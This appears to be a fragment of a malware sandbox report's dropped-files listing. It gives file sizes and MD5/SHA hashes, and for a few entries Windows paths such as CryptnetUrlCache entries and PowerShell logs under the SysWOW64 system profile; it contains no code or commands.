SHA51250891ee450314c16546d413d5628a60e2cb15abd91963c39295c71901edf6918614c62078dffd254b6c7edd18c595bef8538e67c251399b7476b071d304ba16c
-
Filesize
6.3MB
MD5fe4f99cf505c8661a56fa1523d821fbd
SHA115946ca3b9e486416ab584293c6e3a347d8e1a1c
SHA2560ea3061c4b6624937c936aed6536320ad8ef2c6616ee8ffd6046cce3dd8d9977
SHA51250891ee450314c16546d413d5628a60e2cb15abd91963c39295c71901edf6918614c62078dffd254b6c7edd18c595bef8538e67c251399b7476b071d304ba16c
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9
Filesize503B
MD5621508f17d93fd294e34c57dfa64738d
SHA162461f51e5b931c49821642bce03bdcff0a03293
SHA2566f69f363bd19069bcad746e7ae100f3efd32e71a91a876d1962e194e07719664
SHA512640c241218f4fb8012c14e29d33473b93ac4382eba3e87d3795a15ba5a4467e8d3e403bc61842434d01115fa5ba237b2282990150993067239a93e7f9b84b970
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5096a251a73555fb54c92e739952d82b0
SHA1b015cea442200ddbe0ff2a2685c119eae1efb732
SHA2567afdb89207a8ba5e18d3247e3168ce70d5139fdfc650ca74e29f1dd8f080d3d3
SHA512ed6ea5986aac890019bf5e81eead43df2d8eaca7970b41e060fed877195092863a92fe281462ff5f89b86abed16fa3d705fee8b093e82fb326f066f72f1a6a81
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9
Filesize560B
MD5f434efc8e721a0a8b5b9d2789e7a0b59
SHA132242ccfa4d453bb95438c3f721b2bcb3bf4e85a
SHA256168d0a54e2e591dd0b45fa6c880f38e1af7938753f0319994b701ddd23cce339
SHA512aa38ca9d8edae1f6197f882d704d003ab885c65fcfc3f19fa3acafe4c5efac3e5ae97b5c486cb78ed69eaf248de76d12acdeaa021c7617f36f4d416afcb479d1
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD542b8ca9d82a742124c58763ab844c29a
SHA1e931016bb57a4401e619a8f67a3f247268900430
SHA2569e426d99e2382a157c50019c3f00d98d05360e498a5f82bf79d0bbe5535fa2f9
SHA512f452d9089ca3869f7018d1aa87665a4c3994bfd6d9e2b89b75a3ebba1668b09b1b7a69d86c5f8c8cbf7f7a5c4e31c73e60c365bb96bf327695ef261e4f2edcc7
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
5KB
MD5c08ca862600a895f056a9793c63ce8c4
SHA1c1663953c6a769a334df049f9261b1c93a7dc9d4
SHA256f38dd7a41ee55cb192533f61882d9a6e70c4c2c0b6ea1dfc40a89b8331c2f1a0
SHA512768acf32be3651a3a1e5d1387877a287845fe34cf8b8af54cf902f3a413f15e59e3fc7d08bde95d89e211a4db45bfad68828a60f7bcbd5623ce52db2a95760f5
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732